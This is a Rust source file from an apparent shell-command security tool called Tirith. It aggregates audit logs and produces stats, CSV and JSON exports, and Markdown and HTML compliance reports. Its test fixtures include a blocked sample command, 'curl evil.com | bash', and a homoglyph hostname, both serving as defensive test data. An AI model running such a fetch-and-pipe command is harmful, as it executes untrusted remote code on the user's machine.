Skip to main content

tirith_core/
audit_aggregator.rs

//! Audit log aggregation, analytics, and compliance reporting.
//!
//! Reads JSONL audit log files and provides:
//! - Export: filter records and format them as JSON or CSV
//! - Stats: summary analytics, per session or overall
//! - Report: structured compliance reports (Markdown and HTML)
7use std::collections::HashMap;
8use std::path::Path;
9
10use serde::{Deserialize, Serialize};
11
12/// A parsed audit log entry (superset of what we write — tolerates missing fields).
13#[derive(Debug, Clone, Serialize, Deserialize)]
14pub struct AuditRecord {
15    pub timestamp: String,
16    #[serde(default)]
17    pub session_id: String,
18    pub action: String,
19    #[serde(default)]
20    pub rule_ids: Vec<String>,
21    #[serde(default)]
22    pub command_redacted: String,
23    #[serde(default)]
24    pub bypass_requested: bool,
25    #[serde(default)]
26    pub bypass_honored: bool,
27    #[serde(default)]
28    pub interactive: bool,
29    #[serde(default)]
30    pub policy_path: Option<String>,
31    #[serde(default)]
32    pub event_id: Option<String>,
33    #[serde(default)]
34    pub tier_reached: u8,
35}
36
/// Criteria used by `filter_records` to narrow a set of audit records.
///
/// Every criterion is optional; the default value (all `None`, empty
/// `rule_ids`) keeps every record. When several criteria are set, a record
/// must satisfy all of them.
#[derive(Debug, Default)]
pub struct AuditFilter {
    /// Inclusive lower time bound. Compared as an RFC 3339 timestamp when both
    /// this value and the record's timestamp parse, otherwise as plain strings.
    pub since: Option<String>,
    /// Inclusive upper time bound, compared the same way as `since`.
    pub until: Option<String>,
    /// Keep only records whose session ID equals this value exactly.
    pub session_id: Option<String>,
    /// Keep only records with this action (e.g. Allow, Warn, Block); the
    /// comparison ignores ASCII case.
    pub action: Option<String>,
    /// Keep only records that carry at least one of these rule IDs. An empty
    /// list disables the criterion.
    pub rule_ids: Vec<String>,
}
51
52/// Summary statistics from audit records.
53#[derive(Debug, Clone, Serialize)]
54pub struct AuditStats {
55    pub total_commands: usize,
56    pub total_findings: usize,
57    pub actions: HashMap<String, usize>,
58    pub top_rules: Vec<(String, usize)>,
59    pub block_rate: f64,
60    pub sessions_seen: usize,
61    pub time_range: Option<(String, String)>,
62}
63
64/// Result of reading an audit log, including accounting for skipped lines.
65pub struct ReadLogResult {
66    pub records: Vec<AuditRecord>,
67    pub skipped_lines: usize,
68}
69
70/// Read and parse all records from a JSONL audit log.
71pub fn read_log(path: &Path) -> Result<ReadLogResult, String> {
72    let content = std::fs::read_to_string(path)
73        .map_err(|e| format!("Failed to read {}: {e}", path.display()))?;
74
75    let mut records = Vec::new();
76    let mut skipped_lines = 0usize;
77    for (line_num, line) in content.lines().enumerate() {
78        let line = line.trim();
79        if line.is_empty() {
80            continue;
81        }
82        match serde_json::from_str::<AuditRecord>(line) {
83            Ok(record) => records.push(record),
84            Err(e) => {
85                eprintln!(
86                    "tirith: warning: skipping malformed audit line {} in {}: {e}",
87                    line_num + 1,
88                    path.display()
89                );
90                skipped_lines += 1;
91            }
92        }
93    }
94    Ok(ReadLogResult {
95        records,
96        skipped_lines,
97    })
98}
99
100/// Parse an RFC 3339 timestamp, falling back to lexicographic comparison on failure.
101fn parse_ts(ts: &str) -> Option<chrono::DateTime<chrono::FixedOffset>> {
102    chrono::DateTime::parse_from_rfc3339(ts).ok()
103}
104
105/// Filter records by the given criteria.
106pub fn filter_records(records: &[AuditRecord], filter: &AuditFilter) -> Vec<AuditRecord> {
107    records
108        .iter()
109        .filter(|r| {
110            // CR-10: Parse timestamps for proper timezone-aware comparison
111            if let Some(ref since) = filter.since {
112                match (parse_ts(&r.timestamp), parse_ts(since)) {
113                    (Some(rt), Some(st)) => {
114                        if rt < st {
115                            return false;
116                        }
117                    }
118                    _ => {
119                        // Fallback to lexicographic if parsing fails
120                        if r.timestamp.as_str() < since.as_str() {
121                            return false;
122                        }
123                    }
124                }
125            }
126            if let Some(ref until) = filter.until {
127                match (parse_ts(&r.timestamp), parse_ts(until)) {
128                    (Some(rt), Some(ut)) => {
129                        if rt > ut {
130                            return false;
131                        }
132                    }
133                    _ => {
134                        if r.timestamp.as_str() > until.as_str() {
135                            return false;
136                        }
137                    }
138                }
139            }
140            if let Some(ref sid) = filter.session_id {
141                if r.session_id != *sid {
142                    return false;
143                }
144            }
145            if let Some(ref action) = filter.action {
146                if !r.action.eq_ignore_ascii_case(action) {
147                    return false;
148                }
149            }
150            if !filter.rule_ids.is_empty()
151                && !r.rule_ids.iter().any(|rid| filter.rule_ids.contains(rid))
152            {
153                return false;
154            }
155            true
156        })
157        .cloned()
158        .collect()
159}
160
161/// Compute summary statistics from a set of audit records.
162pub fn compute_stats(records: &[AuditRecord]) -> AuditStats {
163    let mut actions: HashMap<String, usize> = HashMap::new();
164    let mut rule_counts: HashMap<String, usize> = HashMap::new();
165    let mut sessions: std::collections::HashSet<String> = std::collections::HashSet::new();
166    let mut total_findings = 0usize;
167
168    for record in records {
169        *actions.entry(record.action.clone()).or_insert(0) += 1;
170        sessions.insert(record.session_id.clone());
171        total_findings += record.rule_ids.len();
172        for rid in &record.rule_ids {
173            *rule_counts.entry(rid.clone()).or_insert(0) += 1;
174        }
175    }
176
177    let block_count = *actions.get("Block").unwrap_or(&0) as f64;
178    let total = records.len() as f64;
179    let block_rate = if total > 0.0 {
180        block_count / total
181    } else {
182        0.0
183    };
184
185    let mut top_rules: Vec<(String, usize)> = rule_counts.into_iter().collect();
186    top_rules.sort_by(|a, b| b.1.cmp(&a.1));
187    top_rules.truncate(10);
188
189    let time_range = if records.is_empty() {
190        None
191    } else {
192        // Use min/max by parsed timestamp (not first/last which assumes order)
193        let min_ts = records
194            .iter()
195            .min_by(
196                |a, b| match (parse_ts(&a.timestamp), parse_ts(&b.timestamp)) {
197                    (Some(ta), Some(tb)) => ta.cmp(&tb),
198                    _ => a.timestamp.cmp(&b.timestamp),
199                },
200            )
201            .map(|r| r.timestamp.clone())
202            .unwrap_or_default();
203        let max_ts = records
204            .iter()
205            .max_by(
206                |a, b| match (parse_ts(&a.timestamp), parse_ts(&b.timestamp)) {
207                    (Some(ta), Some(tb)) => ta.cmp(&tb),
208                    _ => a.timestamp.cmp(&b.timestamp),
209                },
210            )
211            .map(|r| r.timestamp.clone())
212            .unwrap_or_default();
213        Some((min_ts, max_ts))
214    };
215
216    AuditStats {
217        total_commands: records.len(),
218        total_findings,
219        actions,
220        top_rules,
221        block_rate,
222        sessions_seen: sessions.len(),
223        time_range,
224    }
225}
226
227/// Export records as JSON array.
228pub fn export_json(records: &[AuditRecord]) -> String {
229    serde_json::to_string_pretty(records).unwrap_or_else(|e| {
230        eprintln!("tirith: audit: JSON serialization failed: {e}");
231        "[]".to_string()
232    })
233}
234
235/// Export records as CSV (RFC 4180 compliant).
236pub fn export_csv(records: &[AuditRecord]) -> String {
237    let mut out = String::new();
238    out.push_str(
239        "timestamp,session_id,action,rule_ids,command_redacted,bypass_requested,tier_reached\n",
240    );
241    for r in records {
242        let rules = r.rule_ids.join(";");
243        out.push_str(&format!(
244            "{},{},{},{},{},{},{}\n",
245            csv_escape(&r.timestamp),
246            csv_escape(&r.session_id),
247            csv_escape(&r.action),
248            csv_escape(&rules),
249            csv_escape(&r.command_redacted),
250            r.bypass_requested,
251            r.tier_reached
252        ));
253    }
254    out
255}
256
/// Quote a single CSV field according to RFC 4180.
///
/// A field containing a comma, a double quote, a line feed or a carriage
/// return is wrapped in double quotes, with every embedded double quote
/// doubled. Any other field is returned unchanged.
fn csv_escape(field: &str) -> String {
    let needs_quoting = field
        .chars()
        .any(|c| matches!(c, ',' | '"' | '\n' | '\r'));
    if !needs_quoting {
        return field.to_owned();
    }

    // Two extra bytes for the surrounding quotes; doubled quotes may grow it.
    let mut quoted = String::with_capacity(field.len() + 2);
    quoted.push('"');
    for ch in field.chars() {
        if ch == '"' {
            quoted.push('"');
        }
        quoted.push(ch);
    }
    quoted.push('"');
    quoted
}
267
268/// Generate a markdown compliance report from audit records.
269pub fn generate_compliance_report(records: &[AuditRecord], stats: &AuditStats) -> String {
270    let mut report = String::new();
271
272    report.push_str("# Tirith Compliance Report\n\n");
273
274    // Executive summary
275    report.push_str("## Executive Summary\n\n");
276    report.push_str(&format!(
277        "- **Total commands analyzed:** {}\n",
278        stats.total_commands
279    ));
280    report.push_str(&format!("- **Total findings:** {}\n", stats.total_findings));
281    report.push_str(&format!(
282        "- **Block rate:** {:.1}%\n",
283        stats.block_rate * 100.0
284    ));
285    report.push_str(&format!(
286        "- **Sessions observed:** {}\n",
287        stats.sessions_seen
288    ));
289
290    if let Some((ref first, ref last)) = stats.time_range {
291        report.push_str(&format!("- **Time range:** {first} to {last}\n"));
292    }
293    report.push('\n');
294
295    // Action breakdown
296    report.push_str("## Action Breakdown\n\n");
297    report.push_str("| Action | Count |\n|--------|-------|\n");
298    let mut actions: Vec<_> = stats.actions.iter().collect();
299    actions.sort_by(|(a, _), (b, _)| a.cmp(b));
300    for (action, count) in &actions {
301        report.push_str(&format!("| {} | {count} |\n", escape_md_cell(action)));
302    }
303    report.push('\n');
304
305    // Top rules
306    if !stats.top_rules.is_empty() {
307        report.push_str("## Top Triggered Rules\n\n");
308        report.push_str("| Rule ID | Count |\n|---------|-------|\n");
309        for (rule, count) in &stats.top_rules {
310            report.push_str(&format!("| {} | {count} |\n", escape_md_cell(rule)));
311        }
312        report.push('\n');
313    }
314
315    // Blocked commands summary
316    let blocked: Vec<_> = records
317        .iter()
318        .filter(|r| r.action.eq_ignore_ascii_case("Block"))
319        .collect();
320    if !blocked.is_empty() {
321        report.push_str("## Blocked Commands\n\n");
322        report.push_str(
323            "| Timestamp | Rules | Command Preview |\n|-----------|-------|-----------------|\n",
324        );
325        for r in blocked.iter().take(50) {
326            let rules = r.rule_ids.join(", ");
327            report.push_str(&format!(
328                "| {} | {} | {} |\n",
329                escape_md_cell(&r.timestamp),
330                escape_md_cell(&rules),
331                escape_md_cell(&r.command_redacted)
332            ));
333        }
334        if blocked.len() > 50 {
335            report.push_str(&format!(
336                "\n*...and {} more blocked commands*\n",
337                blocked.len() - 50
338            ));
339        }
340        report.push('\n');
341    }
342
343    report
344}
345
346/// Generate a self-contained HTML compliance report from audit records.
347pub fn generate_html_report(records: &[AuditRecord], stats: &AuditStats) -> String {
348    let mut html = String::new();
349    html.push_str(
350        r#"<!DOCTYPE html>
351<html lang="en">
352<head>
353<meta charset="utf-8">
354<title>Tirith Compliance Report</title>
355<style>
356body { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif; max-width: 900px; margin: 2rem auto; padding: 0 1rem; color: #1a1a2e; background: #f8f9fa; }
357h1 { color: #16213e; border-bottom: 2px solid #0f3460; padding-bottom: 0.5rem; }
358h2 { color: #0f3460; margin-top: 2rem; }
359table { border-collapse: collapse; width: 100%; margin: 1rem 0; }
360th, td { border: 1px solid #dee2e6; padding: 0.5rem 0.75rem; text-align: left; }
361th { background: #0f3460; color: white; }
362tr:nth-child(even) { background: #e9ecef; }
363.stat { display: inline-block; background: white; border: 1px solid #dee2e6; border-radius: 8px; padding: 1rem 1.5rem; margin: 0.5rem; text-align: center; min-width: 120px; }
364.stat-value { font-size: 1.5rem; font-weight: bold; color: #0f3460; }
365.stat-label { font-size: 0.85rem; color: #6c757d; }
366.footer { margin-top: 3rem; padding-top: 1rem; border-top: 1px solid #dee2e6; color: #6c757d; font-size: 0.85rem; }
367</style>
368</head>
369<body>
370<h1>Tirith Compliance Report</h1>
371"#,
372    );
373
374    // Stats cards
375    html.push_str("<div>\n");
376    html.push_str(&format!(
377        "<div class=\"stat\"><div class=\"stat-value\">{}</div><div class=\"stat-label\">Commands</div></div>\n",
378        stats.total_commands
379    ));
380    html.push_str(&format!(
381        "<div class=\"stat\"><div class=\"stat-value\">{}</div><div class=\"stat-label\">Findings</div></div>\n",
382        stats.total_findings
383    ));
384    html.push_str(&format!(
385        "<div class=\"stat\"><div class=\"stat-value\">{:.1}%</div><div class=\"stat-label\">Block Rate</div></div>\n",
386        stats.block_rate * 100.0
387    ));
388    html.push_str(&format!(
389        "<div class=\"stat\"><div class=\"stat-value\">{}</div><div class=\"stat-label\">Sessions</div></div>\n",
390        stats.sessions_seen
391    ));
392    html.push_str("</div>\n");
393
394    if let Some((ref first, ref last)) = stats.time_range {
395        html.push_str(&format!(
396            "<p><strong>Time range:</strong> {} to {}</p>\n",
397            html_escape(first),
398            html_escape(last)
399        ));
400    }
401
402    // Action breakdown
403    html.push_str("<h2>Action Breakdown</h2>\n<table><tr><th>Action</th><th>Count</th></tr>\n");
404    let mut actions: Vec<_> = stats.actions.iter().collect();
405    actions.sort_by(|(a, _), (b, _)| a.cmp(b));
406    for (action, count) in &actions {
407        html.push_str(&format!(
408            "<tr><td>{}</td><td>{}</td></tr>\n",
409            html_escape(action),
410            count
411        ));
412    }
413    html.push_str("</table>\n");
414
415    // Top rules
416    if !stats.top_rules.is_empty() {
417        html.push_str(
418            "<h2>Top Triggered Rules</h2>\n<table><tr><th>Rule ID</th><th>Count</th></tr>\n",
419        );
420        for (rule, count) in &stats.top_rules {
421            html.push_str(&format!(
422                "<tr><td>{}</td><td>{}</td></tr>\n",
423                html_escape(rule),
424                count
425            ));
426        }
427        html.push_str("</table>\n");
428    }
429
430    // Blocked commands
431    let blocked: Vec<_> = records
432        .iter()
433        .filter(|r| r.action.eq_ignore_ascii_case("Block"))
434        .collect();
435    if !blocked.is_empty() {
436        html.push_str("<h2>Blocked Commands</h2>\n<table><tr><th>Timestamp</th><th>Rules</th><th>Command Preview</th></tr>\n");
437        for r in blocked.iter().take(50) {
438            let rules = r.rule_ids.join(", ");
439            html.push_str(&format!(
440                "<tr><td>{}</td><td>{}</td><td>{}</td></tr>\n",
441                html_escape(&r.timestamp),
442                html_escape(&rules),
443                html_escape(&r.command_redacted),
444            ));
445        }
446        html.push_str("</table>\n");
447        if blocked.len() > 50 {
448            html.push_str(&format!(
449                "<p><em>...and {} more blocked commands</em></p>\n",
450                blocked.len() - 50
451            ));
452        }
453    }
454
455    html.push_str("<div class=\"footer\">Generated by Tirith</div>\n</body>\n</html>\n");
456    html
457}
458
/// Make `s` safe to place in a single Markdown table cell.
///
/// Pipes are backslash-escaped so they are not read as column separators,
/// line feeds become spaces so the row stays on one line, and carriage
/// returns are dropped.
fn escape_md_cell(s: &str) -> String {
    let mut cell = String::with_capacity(s.len());
    for ch in s.chars() {
        match ch {
            '|' => cell.push_str("\\|"),
            '\n' => cell.push(' '),
            '\r' => {}
            other => cell.push(other),
        }
    }
    cell
}
463
/// Escape the characters that are significant in HTML text and attribute
/// values.
///
/// `&`, `<`, `>`, `"` and `'` are replaced by `&amp;`, `&lt;`, `&gt;`,
/// `&quot;` and `&#39;`. The apostrophe is included so the result is also safe
/// inside single-quoted attributes. All other characters are copied
/// unchanged.
fn html_escape(s: &str) -> String {
    // One pass over the input instead of one intermediate string per
    // replaced character.
    let mut escaped = String::with_capacity(s.len());
    for ch in s.chars() {
        match ch {
            '&' => escaped.push_str("&amp;"),
            '<' => escaped.push_str("&lt;"),
            '>' => escaped.push_str("&gt;"),
            '"' => escaped.push_str("&quot;"),
            '\'' => escaped.push_str("&#39;"),
            other => escaped.push(other),
        }
    }
    escaped
}
471
#[cfg(test)]
mod tests {
    use super::*;

    /// Build a record from the fields that vary between fixtures. The
    /// remaining fields get fixed values (no bypass, interactive, no policy
    /// path, no event ID, tier 3) that individual fixtures override with
    /// struct-update syntax.
    fn record(
        timestamp: &str,
        session_id: &str,
        action: &str,
        rule_ids: &[&str],
        command: &str,
    ) -> AuditRecord {
        AuditRecord {
            timestamp: timestamp.to_string(),
            session_id: session_id.to_string(),
            action: action.to_string(),
            rule_ids: rule_ids.iter().map(|id| id.to_string()).collect(),
            command_redacted: command.to_string(),
            bypass_requested: false,
            bypass_honored: false,
            interactive: true,
            policy_path: None,
            event_id: None,
            tier_reached: 3,
        }
    }

    /// Three records: a block and an allow in `sess-001`, a warn in `sess-002`
    /// one day later.
    fn sample_records() -> Vec<AuditRecord> {
        vec![
            AuditRecord {
                event_id: Some("evt-1".into()),
                ..record(
                    "2026-01-15T10:00:00Z",
                    "sess-001",
                    "Block",
                    &["curl_pipe_shell"],
                    "curl evil.com | bash",
                )
            },
            AuditRecord {
                event_id: Some("evt-2".into()),
                tier_reached: 1,
                ..record("2026-01-15T10:01:00Z", "sess-001", "Allow", &[], "ls -la")
            },
            AuditRecord {
                interactive: false,
                ..record(
                    "2026-01-16T12:00:00Z",
                    "sess-002",
                    "Warn",
                    &["non_ascii_hostname"],
                    "curl http://examp\u{0142}e.com",
                )
            },
        ]
    }

    #[test]
    fn test_filter_by_session() {
        let filter = AuditFilter {
            session_id: Some("sess-001".into()),
            ..Default::default()
        };
        let kept = filter_records(&sample_records(), &filter);
        assert_eq!(kept.len(), 2);
    }

    #[test]
    fn test_filter_by_action() {
        let filter = AuditFilter {
            action: Some("Block".into()),
            ..Default::default()
        };
        let kept = filter_records(&sample_records(), &filter);
        assert_eq!(kept.len(), 1);
        assert_eq!(kept[0].action, "Block");
    }

    #[test]
    fn test_filter_by_since() {
        let filter = AuditFilter {
            since: Some("2026-01-16T00:00:00Z".into()),
            ..Default::default()
        };
        let kept = filter_records(&sample_records(), &filter);
        assert_eq!(kept.len(), 1);
        assert_eq!(kept[0].session_id, "sess-002");
    }

    #[test]
    fn test_filter_by_rule_ids() {
        let filter = AuditFilter {
            rule_ids: vec!["curl_pipe_shell".into()],
            ..Default::default()
        };
        let kept = filter_records(&sample_records(), &filter);
        assert_eq!(kept.len(), 1);
    }

    #[test]
    fn test_compute_stats() {
        let stats = compute_stats(&sample_records());

        assert_eq!(stats.total_commands, 3);
        assert_eq!(stats.total_findings, 2);
        assert_eq!(stats.sessions_seen, 2);
        assert!((stats.block_rate - 1.0 / 3.0).abs() < 0.01);
        assert!(stats.time_range.is_some());
    }

    #[test]
    fn test_export_csv() {
        let csv = export_csv(&sample_records());
        let lines: Vec<&str> = csv.lines().collect();
        assert_eq!(lines.len(), 4); // header + 3 records
        assert!(lines[0].starts_with("timestamp,"));
        assert!(lines[1].contains("Block"));
    }

    #[test]
    fn test_export_json() {
        let json = export_json(&sample_records());
        // The export must round-trip through the record type.
        let parsed: Vec<AuditRecord> = serde_json::from_str(&json).unwrap();
        assert_eq!(parsed.len(), 3);
    }

    #[test]
    fn test_compliance_report() {
        let records = sample_records();
        let stats = compute_stats(&records);
        let report = generate_compliance_report(&records, &stats);

        for expected in [
            "# Tirith Compliance Report",
            "Total commands analyzed",
            "Block",
            "curl_pipe_shell",
        ] {
            assert!(report.contains(expected));
        }
    }

    #[test]
    fn test_csv_escape() {
        assert_eq!(csv_escape("simple"), "simple");
        assert_eq!(csv_escape("has,comma"), "\"has,comma\"");
        assert_eq!(csv_escape("has\"quote"), "\"has\"\"quote\"");
        assert_eq!(csv_escape("has\nnewline"), "\"has\nnewline\"");
        assert_eq!(csv_escape("a,b\"c\nd"), "\"a,b\"\"c\nd\"");
    }

    #[test]
    fn test_export_csv_rfc4180() {
        let records = vec![record(
            "2026-01-15T10:00:00Z",
            "sess-001",
            "Block",
            &["test_rule"],
            "echo \"hello, world\"",
        )];
        let csv = export_csv(&records);
        let lines: Vec<&str> = csv.lines().collect();
        assert_eq!(lines.len(), 2);
        // Field with comma and quotes should be properly escaped
        assert!(lines[1].contains("\"echo \"\"hello, world\"\"\""));
    }

    #[test]
    fn test_empty_records() {
        let stats = compute_stats(&[]);
        assert_eq!(stats.total_commands, 0);
        assert_eq!(stats.block_rate, 0.0);
        assert!(stats.time_range.is_none());
    }
}